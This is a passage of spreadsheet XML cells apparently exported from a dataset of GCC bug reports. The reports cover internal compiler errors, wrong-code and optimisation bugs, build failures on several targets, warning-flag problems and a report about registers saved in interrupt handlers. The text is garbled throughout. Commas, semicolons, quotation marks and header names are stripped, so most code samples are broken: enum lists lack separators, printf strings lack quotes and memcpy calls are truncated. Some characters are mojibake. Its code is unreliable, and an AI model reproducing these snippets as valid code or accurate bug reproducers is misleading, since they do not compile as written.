And then forwprop optimize to infinite loop (test.c.185t.forwprop4):
...
 Function main (main funcdef_no=3 decl_uid=1434 cgraph_uid=3 symbol_order=7) (executed once)
  Replaced '_22 != 0B' with '1'
Removing basic block 5
Merging blocks 4 and 3
main ()
...
   [100.00%]:
  # ivtmp.37_10 = PHI 
  _21 = 6 - ivtmp.37_10
  _22 = oops!\n + _21
  _23 = (unsigned int) _22
  _2 = _fgetc ()
  c_17 = (int) _2
  _24 = (void *) ivtmp.37_10
  _5 = MEM[base: _24 offset: 0B]
  _6 = (int) _5
  _7 = _2 == _5
  _8 = (int) _7
  check (c_17 _6 _8)
  ivtmp.37_3 = ivtmp.37_10 + 1
  goto  [100.00%]</t>
  </si>
  <si>
    <t>GCC-70696</t>
  </si>
  <si>
    <t>[Coarray] ICE on EVENT POST of host-associated EVENT_TYPE coarray</t>
  </si>
  <si>
    <t>With -fcoarray=lib an internal compiler error occurs when compiling an EVENT POST of an EVENT_TYPE coarray that accessed via host association.  The ICE disappears if the program is compiled with -fcoarray=single or if the event is moved into the subroutine that contains the EVENT POST.  Moving the event there necessitates giving it the SAVE attribute which appears to be unrelated to the ICE because the ICE occurs with the event in the host even if given the SAVE attribute in the host.
$ cat post_host_associated_event.f90 
  use iso_fortran_env
  type(event_type) :: x[*] 
contains
  subroutine exchange
    event post(x[1])
  end subroutine
end 
$ gfortran -fcoarray=single post_host_associated_event.f90
$ gfortran -fcoarray=lib post_host_associated_event.f90
post_host_associated_event.f90:5:0:
     event post(x[1])
internal compiler error: in gfc_get_tree_for_caf_expr at fortran/trans-expr.c:1852
post_host_associated_event.f90:5:0: internal compiler error: Abort trap: 6
gfortran: internal compiler error: Abort trap: 6 (program f951)
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ gfortran --version
GNU Fortran (MacPorts gcc6 6-20160327_0) 6.0.0 20160327 (experimental)</t>
  </si>
  <si>
    <t>GCC-37816</t>
  </si>
  <si>
    <t>[c++0x] Invalid handling of scoped enums defined at class scope</t>
  </si>
  <si>
    <t>Code below presents behavior which I think is incorrect:
class A
{
    enum class Color { Red Orange Yellow Green Blue Violet }
    enum class Alert { Green Yellow Red }
}
$ g++-4.4.0-alpha20081010  -c -std=c++0x /tmp/enum_class.cc 
/tmp/enum_class.cc:4: error: declaration of â€˜Greenâ€™
/tmp/enum_class.cc:3: error: conflicts with previous declaration â€˜A::Color A::Greenâ€™
/tmp/enum_class.cc:4: error: declaration of â€˜Yellowâ€™
/tmp/enum_class.cc:3: error: conflicts with previous declaration â€˜A::Color A::Yellowâ€™
/tmp/enum_class.cc:4: error: declaration of â€˜Redâ€™
/tmp/enum_class.cc:3: error: conflicts with previous declaration â€˜A::Color A::Redâ€™
Moreover code:
class A
{
    enum class Color { Red Orange Yellow Green Blue Violet }
    static const Color x = Red
}
is incorrectly accepted.
This behavior is consistent in both versions i have checked namely gcc-g++-20080912 and gcc-g++-20081010.</t>
  </si>
  <si>
    <t>piotr.rak</t>
  </si>
  <si>
    <t>GCC-66389</t>
  </si>
  <si>
    <t>sh2eb-linux-* is not recognized by configure</t>
  </si>
  <si>
    <t>The processor type sh2eb is not recognized by configure at least not for Linux targets and the only way I could find to get a working big endian sh2 compiler was to use sheb-linux-* yielding default code generation for sh1 rather than sh2. Binutils is affected by the same issue.
Reportedly this is a regression since 4.2.1 and binutils 2.17.</t>
  </si>
  <si>
    <t>GCC-67648</t>
  </si>
  <si>
    <t>No need to save callee-saved registers in interrupt handler</t>
  </si>
  <si>
    <t>[hjl@gnu-6 interrupt-1]$ cat call-1.i
extern void bar (void)
void
 __attribute__ ((interrupt))
foo (void)
{
  bar ()
}
[hjl@gnu-6 interrupt-1]$ make call-1.s
/export/build/gnu/gcc/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc/build-x86_64-linux/gcc/ -O2 -S -o call-1.s call-1.i
[hjl@gnu-6 interrupt-1]$ cat call-1.s
	.file	call-1.i
	.section	.text.unlikelyax@progbits
.LCOLDB0:
	.text
.LHOTB0:
	.p2align 415
	.globl	foo
	.type	foo @function
foo:
.LFB0:
	.cfi_startproc
	pushq	%r15
	.cfi_def_cfa_offset 16
	.cfi_offset 15 -16
	pushq	%r14
	.cfi_def_cfa_offset 24
	.cfi_offset 14 -24
	pushq	%r13
	.cfi_def_cfa_offset 32
	.cfi_offset 13 -32
	pushq	%r12
	.cfi_def_cfa_offset 40
	.cfi_offset 12 -40
	pushq	%r11
	.cfi_def_cfa_offset 48
	.cfi_offset 11 -48
	pushq	%r10
	.cfi_def_cfa_offset 56
	.cfi_offset 10 -56
	pushq	%r9
	.cfi_def_cfa_offset 64
	.cfi_offset 9 -64
	pushq	%r8
	.cfi_def_cfa_offset 72
	.cfi_offset 8 -72
	pushq	%rbp
	.cfi_def_cfa_offset 80
	.cfi_offset 6 -80
	pushq	%rdi
	.cfi_def_cfa_offset 88
	.cfi_offset 5 -88
	pushq	%rsi
	.cfi_def_cfa_offset 96
	.cfi_offset 4 -96
	pushq	%rbx
	.cfi_def_cfa_offset 104
	.cfi_offset 3 -104
	pushq	%rcx
	.cfi_def_cfa_offset 112
	.cfi_offset 2 -112
	pushq	%rdx
	.cfi_def_cfa_offset 120
	.cfi_offset 1 -120
	pushq	%rax
	.cfi_def_cfa_offset 128
	.cfi_offset 0 -128
	subq	$256 %rsp
	.cfi_def_cfa_offset 384
	movups	%xmm0 (%rsp)
	movups	%xmm1 16(%rsp)
	movups	%xmm2 32(%rsp)
	movups	%xmm3 48(%rsp)
	movups	%xmm4 64(%rsp)
	movups	%xmm5 80(%rsp)
	movups	%xmm6 96(%rsp)
	movups	%xmm7 112(%rsp)
	movups	%xmm8 128(%rsp)
	movups	%xmm9 144(%rsp)
	movups	%xmm10 160(%rsp)
	movups	%xmm11 176(%rsp)
	movups	%xmm12 192(%rsp)
	movups	%xmm13 208(%rsp)
	movups	%xmm14 224(%rsp)
	movups	%xmm15 240(%rsp)
	.cfi_offset 17 -384
	.cfi_offset 18 -368
	.cfi_offset 19 -352
	.cfi_offset 20 -336
	.cfi_offset 21 -320
	.cfi_offset 22 -304
	.cfi_offset 23 -288
	.cfi_offset 24 -272
	.cfi_offset 25 -256
	.cfi_offset 26 -240
	.cfi_offset 27 -224
	.cfi_offset 28 -208
	.cfi_offset 29 -192
	.cfi_offset 30 -176
	.cfi_offset 31 -160
	.cfi_offset 32 -144
	call	bar
	movups	(%rsp) %xmm0
	movups	16(%rsp) %xmm1
	movups	32(%rsp) %xmm2
	movups	48(%rsp) %xmm3
	movups	64(%rsp) %xmm4
	movups	80(%rsp) %xmm5
	movups	96(%rsp) %xmm6
	movups	112(%rsp) %xmm7
	movups	128(%rsp) %xmm8
	movups	144(%rsp) %xmm9
	movups	160(%rsp) %xmm10
	movups	176(%rsp) %xmm11
	movups	192(%rsp) %xmm12
	movups	208(%rsp) %xmm13
	movups	224(%rsp) %xmm14
	movups	240(%rsp) %xmm15
	addq	$256 %rsp
	.cfi_restore 32
	.cfi_restore 31
	.cfi_restore 30
	.cfi_restore 29
	.cfi_restore 28
	.cfi_restore 27
	.cfi_restore 26
	.cfi_restore 25
	.cfi_restore 24
	.cfi_restore 23
	.cfi_restore 22
	.cfi_restore 21
	.cfi_restore 20
	.cfi_restore 19
	.cfi_restore 18
	.cfi_restore 17
	.cfi_def_cfa_offset 128
	popq	%rax
	.cfi_def_cfa_offset 120
	popq	%rdx
	.cfi_def_cfa_offset 112
	popq	%rcx
	.cfi_def_cfa_offset 104
	popq	%rbx
	.cfi_def_cfa_offset 96
	popq	%rsi
	.cfi_def_cfa_offset 88
	popq	%rdi
	.cfi_def_cfa_offset 80
	popq	%rbp
	.cfi_def_cfa_offset 72
	popq	%r8
	.cfi_def_cfa_offset 64
	popq	%r9
	.cfi_def_cfa_offset 56
	popq	%r10
	.cfi_def_cfa_offset 48
	popq	%r11
	.cfi_def_cfa_offset 40
	popq	%r12
	.cfi_def_cfa_offset 32
	popq	%r13
	.cfi_def_cfa_offset 24
	popq	%r14
	.cfi_def_cfa_offset 16
	popq	%r15
	.cfi_def_cfa_offset 8
	iret
	.cfi_endproc
.LFE0:
	.size	foo .-foo
	.section	.text.unlikely
.LCOLDE0:
	.text
.LHOTE0:
	.ident	GCC: (GNU) 6.0.0 20150917 (experimental)
	.section	.note.GNU-stack@progbits
[hjl@gnu-6 interrupt-1]$ 
Since RBX and R12-R15 registers are callee-saved we don't need
to save and restore them in interrupt handler unless they are
modified.</t>
  </si>
  <si>
    <t>GCC-18329</t>
  </si>
  <si>
    <t>[4.0 regression] mmix-knuth-mmixware testsuite failure: execute/920501-7.c execute/comp-goto-2.c</t>
  </si>
  <si>
    <t>With LAST_UPDATED: Sat Nov  6 19:25:03 GMT 2004 I get:
FAIL: gcc.c-torture/execute/920501-7.c execution  -O1
FAIL: gcc.c-torture/execute/920501-7.c execution  -O2
FAIL: gcc.c-torture/execute/920501-7.c execution  -O3 -fomit-frame-pointer
FAIL: gcc.c-torture/execute/920501-7.c execution  -O3 -g
FAIL: gcc.c-torture/execute/920501-7.c execution  -Os
The tests began failing with Fri Nov 5 02:43:31 GMT 2004
Known to work with Tue Nov 2 21:16:11 GMT 2004.
The failures are not due to abort calls.</t>
  </si>
  <si>
    <t>GCC-6172</t>
  </si>
  <si>
    <t>[fr30-elf] does not build</t>
  </si>
  <si>
    <t>/home/hp/builds2/fr30-sim/gcc/xgcc -B/home/hp/builds2/fr30-sim/gcc/ -nostdinc -B/home/hp/builds2/fr30-sim/fr30-elf/newlib/ -isyst\
em /home/hp/builds2/fr30-sim/fr30-elf/newlib/targ-include -isystem /home/hp/cvs_areas/combined/cvs_write/newlib/libc/include -B/h\
ome/hp/builds2/fr30-sim/../install-fr30sim/fr30-elf/bin/ -B/home/hp/builds2/fr30-sim/../install-fr30sim/fr30-elf/lib/ -isystem /h\
ome/hp/builds2/fr30-sim/../install-fr30sim/fr30-elf/include -L/home/hp/builds2/fr30-sim/ld -O2  -DIN_GCC -DCROSS_COMPILE   -W -Wa\
ll -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include   -g  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -Dinhi\
bit_libc -I. -I. -I/home/hp/cvs_areas/combined/cvs_write/gcc -I/home/hp/cvs_areas/combined/cvs_write/gcc/. -I/home/hp/cvs_areas/c\
ombined/cvs_write/gcc/config -I/home/hp/cvs_areas/combined/cvs_write/gcc/../include -DFINE_GRAINED_LIBRARIES -DL_addsub_df -c dp-\
bit.c -o libgcc/./_addsub_df.o
dp-bit.c: In function `_fpadd_parts':
dp-bit.c:561: Internal compiler error in change_address_1 at emit-rtl.c:1784
Release:
trunk last_updated Thu Apr  4 11:18:41 GMT 2002
Environment:
Cross from i686-pc-linux-gnu to fr30-elf
How-To-Repeat:
Use  as basic
build description building to fr30-elf.</t>
  </si>
  <si>
    <t>nickc</t>
  </si>
  <si>
    <t>GCC-28968</t>
  </si>
  <si>
    <t>gcc/config/i386/winnt-stubs.c is not linked in -&gt; build fails</t>
  </si>
  <si>
    <t>When configuring gcc-{4.1.04.1.1} as
$ CC=gcc-4.1 ../gcc-4.1.1/configure --target=i586-pc-interix3 \
        --enable-languages=c \
        --enable-threads=no \
        --with-stabs \
        --enable-nls \
        --disable-shared \
        --disable-libssp \
        --with-gnu-as \
        --with-gnu-ld
the subsequent
$ make
fails with the following linker error:
gcc/config/i386/winnt.c:
symbols i386_pe_type_dllexport_p and i386_pe_type_dllimport_p are undefined!
Modifying winnt.c to
#include winnt-stubs.c
works around the problem.</t>
  </si>
  <si>
    <t>mkoeppe</t>
  </si>
  <si>
    <t>GCC-3681</t>
  </si>
  <si>
    <t>Problem preprocecisng a fortran source code with cpp</t>
  </si>
  <si>
    <t>Preprocesing this simple code with cpp 
      program total
      write(6'(''Warning specified for ''''optimisation ****'')')
      write(6'(''  **** A single point energy calculation to ''
     &amp;  ''be performed ****'')')
      end
I find the following problem:
1.f:5:66: missing terminating ' character
1.f:6:33: missing terminating ' character
Lines 4 and 5-6 are equal but the cpp do not recognice the
broken line. When I copile with g77 I don't find any problem.
Release:
GNUCPP version 2.96 20000731 (Linux-Mandrake 8.0 2.96-0.48mdk)</t>
  </si>
  <si>
    <t>jmlloren</t>
  </si>
  <si>
    <t>GCC-77837</t>
  </si>
  <si>
    <t>missing -Wformat-length warning for %p with null argument on powerpc64</t>
  </si>
  <si>
    <t>When configured for most *-linux targets with Glibc including s390x sparc and x86_64 GCC prints the warnings below for the following program as expected because Glibc %p formats null arguments as (nil):
$ cat t.c &amp;&amp; /build/sysroot/sparc-unknown-linux/bin/sparc-unknown-linux-gcc -S -Wall t.c
char d[5]
void f (void)
{
  __builtin_sprintf (d + 0 %p (void*)0)
  __builtin_sprintf (d + 4 %p (void*)0)
}
t.c: In function 'f':
t.c:5:32: warning: writing a terminating nul past the end of the destination [-Wformat-length=]
   __builtin_sprintf (d + 0 %p (void*)0)
                              ~~^
t.c:5:3: note: format output 6 bytes into a destination of size 5
   __builtin_sprintf (d + 0 %p (void*)0)
   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
t.c:6:30: warning: '%p' directive writing 5 bytes into a region of size 1 [-Wformat-length=]
   __builtin_sprintf (d + 4 %p (void*)0)
                              ^~
t.c:6:3: note: format output 6 bytes into a destination of size 1
   __builtin_sprintf (d + 4 %p (void*)0)
   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
However when configured for powerpc64* (either as a native compiler or a cross-compiler) it prints just the following indicating that it thinks that %p with a null argument produces a single digit which is contrary to the Glibc implementation:
t.c:6:32: warning: writing a terminating nul past the end of the destination [-Wformat-length=]
   __builtin_sprintf (d + 4 %p (void*)0)
                              ~~^
t.c:6:3: note: format output 2 bytes into a destination of size 1
   __builtin_sprintf (d + 4 %p (void*)0)
   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This appears to be because the %p format expected by GCC is determined by a printf_pointer_format target hook which is initialized to the gnu_libc_printf_pointer_format function in most back ends for Linux except in rs6000.o.  There it's initialized to the default_printf_pointer_format function.  The target hook initialization is the result of expanding the TARGET_PRINTF_POINTER_FORMAT macro which is defined to gnu_libc_printf_pointer_format in the config/linux.h header.   This header is in turn included by most back ends for Linux but not by rs6000.c</t>
  </si>
  <si>
    <t>GCC-41869</t>
  </si>
  <si>
    <t>ICE segfault when reading module file</t>
  </si>
  <si>
    <t>The following program ICEs with
  test.f90:25:0: internal compiler error: Segmentation fault
The problem is related to PUBIC vs. PRIVATE visibility. It is no regression as 4.1.2 4.2.1 4.3.3 4.4.1 and 4.5 crash. The program compiles with NAG f95 and g95.
Valgrind shows:
==31812== Invalid read of size 8
==31812==    at 0x4F4B80: mio_pointer_ref (module.c:2233)
==31812==    by 0x6D05D0F: ???
==31812==    by 0x4F6698: mio_symbol_ref (module.c:2494)
==31812==    by 0x4F7137: mio_expr (module.c:3029)
gdb shows:
Program received signal SIGSEGV Segmentation fault.
mio_pointer_ref (gp=0x28) at /home/tob/projects/gcc-trunk-checkout/gcc/fortran/module.c:2233
2233          p = get_pointer (*((char **) gp))
(gdb) bt
#0  mio_pointer_ref (gp=0x28) at /home/tob/projects/gcc-trunk-checkout/gcc/fortran/module.c:2233
#1  0x00000000004f6699 in mio_symbol_ref (symp=) at /home/tob/projects/gcc-trunk-checkout/gcc/fortran/module.c:2494
#2  0x00000000004f7138 in mio_expr (ep=0x13a96c0) at /home/tob/projects/gcc-trunk-checkout/gcc/fortran/module.c:3029
#3  0x00000000004f7a7a in mio_array_spec (asp=) at /home/tob/projects/gcc-trunk-checkout/gcc/fortran/module.c:2134
#4  0x00000000004f7d07 in mio_symbol (sym=0x13a7930) at /home/tob/projects/gcc-trunk-checkout/gcc/fortran/module.c:3540
#5  0x00000000004f81d0 in write_symbol (n=40 sym=0x13a7930) at /home/tob/projects/gcc-trunk-checkout/gcc/fortran/module.c:4725
#6  0x00000000004f8360 in write_symbol0 (st=) at /home/tob/projects/gcc-trunk-checkout/gcc/fortran/module.c:4765
module fox_m_fsys_array_str
contains
  pure function str_vs(vs) result(s)
    character dimension(:) intent(in) :: vs
    character(len=size(vs)) :: s
    s = transfer(vs s)
  end function str_vs
  pure function vs_str(s) result(vs)
    character(len=*) intent(in) :: s
    character dimension(len(s)) :: vs
    vs = transfer(s vs)
  end function vs_str
end module fox_m_fsys_array_str
module fox_m_fsys_format
  private
  interface str
    module procedure  str_logical_array
  end interface str
  interface len
    module procedure str_logical_array_len
  end interface
  public :: str
contains
  pure function str_logical_array_len(la) result(n)
    logical dimension(:) intent(in)   :: la
  end function str_logical_array_len
  pure function str_logical_array(la) result(s)
    logical dimension(:) intent(in)   :: la
    character(len=len(la)) :: s
  end function str_logical_array
  pure function checkFmt(fmt) result(good)
    character(len=*) intent(in) :: fmt
    logical :: good
    good = len(fmt) &gt; 0
  end function checkFmt
end module fox_m_fsys_format
module m_dom_dom
  use fox_m_fsys_array_str only: str_vs vs_str
end module m_dom_dom
module FoX_dom
  use fox_m_fsys_format
  use m_dom_dom
end module FoX_dom</t>
  </si>
  <si>
    <t>GCC-71470</t>
  </si>
  <si>
    <t>Wrong code on trunk gcc with westmere target</t>
  </si>
  <si>
    <t>Created attachment 38665
Reproducer
The test fails only in case array sizes are set in a separate file. init.cpp - initializes the array func.cpp - accesses the elements.
The test fails with 'std::out_of_range' but only on westmere -O3. Other targets/optimizations and compilers seem to work.
Reproduce:
&gt;  g++ -std=c++11 -static-libgcc -static-libstdc++ -O3 -march=westmere -o out func.cpp init.cpp
&gt; ./out
Output:
terminate called after throwing an instance of 'std::out_of_range'
  what():  vector::_M_range_check: __n (which is 3) &gt;= this-&gt;size() (which is 0)
Aborted (core dumped)
&gt; gcc -v:
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/export/users/amitrokh/gcc_trunk/bin/../libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /export/users/gnutester/stability/svn/trunk/configure --with-arch=corei7 --with-cpu=corei7 --enable-clocale=gnu --with-system-zlib --enable-shared --with-demangler-in-ld --enable-cloog-backend=isl --with-fpmath=sse --with-pkgversion=Revision=237240/svn-rev:237241/ --prefix=/export/users/gnutester/stability/work/trunk/64/install --enable-languages=cc++fortranjavalto
Thread model: posix
gcc version 7.0.0 20160608 (experimental) (Revision=237240/svn-rev:237241/)</t>
  </si>
  <si>
    <t>GCC-53322</t>
  </si>
  <si>
    <t>Wunused-local-typedefs is not enabled by Wall or Wunused</t>
  </si>
  <si>
    <t>Since warn_unused_local_typedefs is never -1 then it is never enabled by Wunused.
The fix is:
Index: gcc/c-family/c.opt
===================================================================
--- gcc/c-family/c.opt  (revision 187385)
+++ gcc/c-family/c.opt  (working copy)
@@ -67211 +67211 @@ Warn about unrecognized pragmas
 Wunsuffixed-float-constants
 C ObjC Var(warn_unsuffixed_float_constants) Warning
 Warn about unsuffixed float constants
 Wunused-local-typedefs
-C ObjC C++ ObjC++ Var(warn_unused_local_typedefs) Warning
+C ObjC C++ ObjC++ Var(warn_unused_local_typedefs) Warning EnabledBy(Wunused)
 Warn when typedefs locally defined in a function are not used
 Wunused-macros
 C ObjC C++ ObjC++ Warning
 Warn about macros defined in the main file that are not used
But I am sure this will trigger some warnings.</t>
  </si>
  <si>
    <t>GCC-45823</t>
  </si>
  <si>
    <t>Bogus warning for intrinsic module procedures</t>
  </si>
  <si>
    <t>Follow up to PR 40569. The following program prints with -Wall:
use iso_Fortran_env
                   1
Warning: Type specified for intrinsic function 'compiler_options' at (1) is ignored
use iso_Fortran_env
                   1
Warning: Type specified for intrinsic function 'compiler_version' at (1) is ignored
For some reason c_sizeof is not affected.
use iso_c_binding
use iso_Fortran_env
implicit none
intrinsic sin
real :: x = 3.4
print * sin(x) c_sizeof(c_int) compiler_options() compiler_version()
end</t>
  </si>
  <si>
    <t>GCC-2472</t>
  </si>
  <si>
    <t>bug in installation of gcc</t>
  </si>
  <si>
    <t>while installing gcc on a NEC workstation running mips-nec-sysv4.2MP the following error message appears
Bootstrapping the compiler
make[1]: Entering directory `/tmp_mnt/disk/disk06/pan/local/gcc'
make CC=cc libdir=/disk/disk06/pan/local/lib LANGUAGES=c 
make[2]: Entering directory `/tmp_mnt/disk/disk06/pan/local/gcc'
rm -f alloca.c
ln -s /disk/disk06/pan/temp/gcc-2.95.2/gcc/../libiberty/alloca.c alloca.c
cc  -DIN_GCC     -g  -DHAVE_CONFIG_H    -I. -I/disk/disk06/pan/temp/gcc-2.95.2/gcc -I/disk/disk06/pan/temp/gcc-2.95.2/gcc/config -I/disk/disk06/pan/temp/gcc-2.95.2/gcc/../include  \
  -c `echo alloca.c | sed 's^\./'`
cfe: Error: alloca.c line 172: redeclaration of 'alloca' previous declaration at line 68 in file '/disk/disk06/pan/temp/gcc-2.95.2/gcc/config/mips/xm-mips.h'
 alloca (size)
 ^
cfe: Error: alloca.c line 172: Incompatible function return type for this function.
 alloca (size)
 -------^
make[2]: *** [alloca.o] Error 1
make[2]: Leaving directory `/tmp_mnt/disk/disk06/pan/local/gcc'
make[1]: *** [bootstrap] Error 2
make[1]: Leaving directory `/tmp_mnt/disk/disk06/pan/local/gcc'
make: *** [bootstrap] Error 2
Release:
gcc-2.95.2
Environment:
UNIX_SV NEC workstation</t>
  </si>
  <si>
    <t>yupan</t>
  </si>
  <si>
    <t>GCC-19087</t>
  </si>
  <si>
    <t>Overflowed address in dwarf debug line information</t>
  </si>
  <si>
    <t>The mapping between addresses and code locations is invalid in object files
compiled for AVR targets that addresses code above 64K. This seems like a
rollover bug because addresses immediately above 64K have values near 0. 
To reproduce this bug generate a source file that uses more than 64K of program
memory and try to parse the .debug_line section using libdwarf or by
implementing the state machine described in section 6.2 of DWARF Debugging
Information Format revision 2.0.0
This is probably a side-effect of the AVR usually only addressing 64K of program
memory. 
http://reality.sgi.com/davea/
http://dwarf.freestandards.org/modules.php?name=Content&amp;pa=showpage&amp;pid=6</t>
  </si>
  <si>
    <t>tsandnes</t>
  </si>
  <si>
    <t>GCC-13095</t>
  </si>
  <si>
    <t>GCC accepts invalid using declaration</t>
  </si>
  <si>
    <t>The following code in invalid IMHO since using declarations shall refer to
members of base classes (according to [7.3.3]/4) but B is not a base class.
===========================================
template  struct A
{
    int i
}
template  struct B : A
{
    using B::i
    int foo() { return i }
}
===========================================
However gcc accepts the code since at least 2.95.x.</t>
  </si>
  <si>
    <t>GCC-2837</t>
  </si>
  <si>
    <t>Reference counted string is not smp safe</t>
  </si>
  <si>
    <t>The reference count increment in method Rep::grab of the 
basic_string template class in std/bastring.h is not
smp safe on an intel machine. The most common effect seems
to be that the static global nilRep structure ends up with a 
zero reference count and gets deleted nasty things follow.
Release:
2.95.2 and 2.95.3</t>
  </si>
  <si>
    <t>graemeb</t>
  </si>
  <si>
    <t>GCC-79520</t>
  </si>
  <si>
    <t>Spurious caching for constexpr arguments</t>
  </si>
  <si>
    <t>constexpr int f(int const}
constexpr struct S {
    int x = 0
    constexpr S() {(void)f(x) x = 1}
} s
static_assert(f(s.x) == 1 )
---
Presumably s.x is taken to be immutable because s is constexpr while that's obviously not true during the period of construction.</t>
  </si>
  <si>
    <t>columbo</t>
  </si>
  <si>
    <t>GCC-39034</t>
  </si>
  <si>
    <t>Decimal floating-point math done wrong</t>
  </si>
  <si>
    <t>Using gcc 4.3.2-7 on Intel Pentium 4 running Fedora Core 10 with -std=gnu99 of
/* DFP TR 24732 == WG14 / N1176 N1312 */
#define __STDC_WANT_DEC_FP__ /* Tell implementation that we want Decimal FP */
#include 	/* printf() */
int main(void){
  double     d2  = (double)((28./3.-9.) - (31./3.-10.))
  _Decimal64 d10 = (double)((28./3.-9.) - (31./3.-10.))
  if( d2 ){
    printf(d2 should be zero\n)
  }
  if( d10 ){
    printf(d10 should be zero\n)
  }
  return 0
}
gets:
d10 should be zero
This should be independent of Translation Time Data Type (TTDT)
which has been dropped from the DFP TR as of WG14 N1312.</t>
  </si>
  <si>
    <t>tydeman</t>
  </si>
  <si>
    <t>GCC-37421</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE in vn_reference_insert_pieces at tree-ssa-sccvn.c:1131</t>
  </si>
  <si>
    <t>Found with this test case.  Still have not analyzed it so I'm not quite sure where we're getting confused:
#include 
#include 
inline int
bci (const float &amp;source)
{
 int dest
 memcpy (
 return dest
}
inline float
bcf (const int &amp;source)
{
 float dest
 memcpy (
 return dest
}
float
Foo ()
{
 const int foo = bci (0.0f)
 int bar = foo
 const int baz = foo 
 if (!baz &amp;&amp; (foo &amp; 2))
   bar = 0
 return bcf (bar)
}
main ()
{
  printf (Foo() = %f\n Foo())
}
$ /bin/g++ -o mathutil -O2 mathutil.cc
mathutil.cc: In function 'float Foo()':
mathutil.cc:21: internal compiler error: in vn_reference_insert_pieces at tree-ssa-sccvn.c:1131
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-43981</t>
  </si>
  <si>
    <t>[4.6 Regression] -Wunused-but-set-variable does not consider array sizing use of a variable</t>
  </si>
  <si>
    <t>This simple program
  void g(char*)
  char f(unsigned a) {
    unsigned len=a*3 
    char t[len]
    g(t)
    return t[0]
  }
issues warning: variable 'len' set but not used even though len 
appears in char t[len]</t>
  </si>
  <si>
    <t>GCC-58443</t>
  </si>
  <si>
    <t>ubsan doesn't properly honor fsanitize= flags</t>
  </si>
  <si>
    <t>$ cat z.c
int
main (void)
{
  int i = 12
  i &lt;&lt;= 48
  return 0
}
$ gcc -w -o z{.c} -fsanitize=unreachable &amp;&amp; ./z
z.c:5:5: runtime error: shift exponent 48 is too large for 32-bit type int
We shouldn't instrument shifts only __builtin_unreachable's in this case.</t>
  </si>
  <si>
    <t>GCC-61631</t>
  </si>
  <si>
    <t>[4.10 regression] ICE unwind-dw2.c:1639:5: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>r212073 FAIL
r211865 PASS
Fedora 20 x86_64
configure --enable-checking=fold --disable-multilib
make
[stage1 pass]
[...]
/home/dimhen/build/gcc_current/./gcc/xgcc -B/home/dimhen/build/gcc_current/./gcc/ -B/usr/local/x86_64-unknown-linux-gnu/bin/ -B/usr/local/x86_64-unknown-linux-gnu/lib/ -isystem /usr/local/x86_64-unknown-linux-gnu/include -isystem /usr/local/x86_64-unknown-linux-gnu/sys-include    -g -O2 -O2  -g -O2 -DIN_GCC    -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wno-format -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -fpic -mlong-double-80 -g -DIN_LIBGCC2 -fbuilding-libgcc -fno-stack-protector   -fpic -mlong-double-80 -I. -I. -I../.././gcc -I/home/dimhen/src/gcc_current/libgcc -I/home/dimhen/src/gcc_current/libgcc/. -I/home/dimhen/src/gcc_current/libgcc/../gcc -I/home/dimhen/src/gcc_current/libgcc/../include -I/home/dimhen/src/gcc_current/libgcc/config/libbid -DENABLE_DECIMAL_BID_FORMAT -DHAVE_CC_TLS  -DUSE_TLS -o unwind-dw2.o -MT unwind-dw2.o -MD -MP -MF unwind-dw2.dep -fexceptions -c /home/dimhen/src/gcc_current/libgcc/unwind-dw2.c -fvisibility=hidden -DHIDE_EXPORTS
/home/dimhen/src/gcc_current/libgcc/unwind-dw2.c: In function 'uw_install_context_1':
/home/dimhen/src/gcc_current/libgcc/unwind-dw2.c:1639:5: internal compiler error: Segmentation fault
     _Unwind_SetSpColumn (target target-&gt;cfa 
     ^
0xae996b crash_signal
	/home/dimhen/src/gcc_current/gcc/toplev.c:337
0x86e62f fold_checksum_tree
	/home/dimhen/src/gcc_current/gcc/fold-const.c:14759
0x86ec3e fold_checksum_tree
	/home/dimhen/src/gcc_current/gcc/fold-const.c:14861
0x86ed58 fold_checksum_tree
	/home/dimhen/src/gcc_current/gcc/fold-const.c:14872
0x86e832 fold_checksum_tree
	/home/dimhen/src/gcc_current/gcc/fold-const.c:14791
0x86e832 fold_checksum_tree
	/home/dimhen/src/gcc_current/gcc/fold-const.c:14791
0x86e400 fold(tree_node*)
	/home/dimhen/src/gcc_current/gcc/fold-const.c:14706
0x66bab7 c_fully_fold_internal
	/home/dimhen/src/gcc_current/gcc/c-family/c-common.c:1365
0x66af75 c_fully_fold(tree_node* bool bool*)
	/home/dimhen/src/gcc_current/gcc/c-family/c-common.c:1097
0x62bcdf convert_arguments
	/home/dimhen/src/gcc_current/gcc/c/c-typeck.c:3112
0x62b569 build_function_call_vec(unsigned int vec tree_node* vec* vec*)
	/home/dimhen/src/gcc_current/gcc/c/c-typeck.c:2903
0x62b9e2 c_build_function_call_vec(unsigned int vec tree_node* vec* vec*)
	/home/dimhen/src/gcc_current/gcc/c/c-typeck.c:2988
0x655b4b c_parser_postfix_expression_after_primary
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:7729
0x655598 c_parser_postfix_expression
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:7563
0x652814 c_parser_unary_expression
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:6502
0x651d88 c_parser_cast_expression
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:6340
0x650b7d c_parser_binary_expression
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:6155
0x6505c2 c_parser_conditional_expression
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:5931
0x65034a c_parser_expr_no_commas
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:5849
0x65612e c_parser_expression
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:7856
Please submit a full bug report
with preprocessed source if appropriate.
